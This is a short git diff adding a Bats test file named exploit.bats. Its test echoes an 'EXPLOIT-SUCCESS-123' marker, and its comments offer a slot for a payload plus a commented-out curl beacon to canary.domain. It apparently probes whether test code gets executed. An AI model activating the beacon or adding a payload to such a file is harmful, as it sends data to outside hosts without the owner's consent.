diff --git a/tests/exploit.bats b/tests/exploit.bats new file mode 100644 index 0000000..7582848 --- /dev/null +++ b/tests/exploit.bats @@ -0,0 +1,7 @@ +#!/usr/bin/env bats + +@test "exploit test" { + echo "EXPLOIT-SUCCESS-123" + # Additional payload could go here + # curl -s http://canary.domain/$(date +%s) || true +} \ No newline at end of file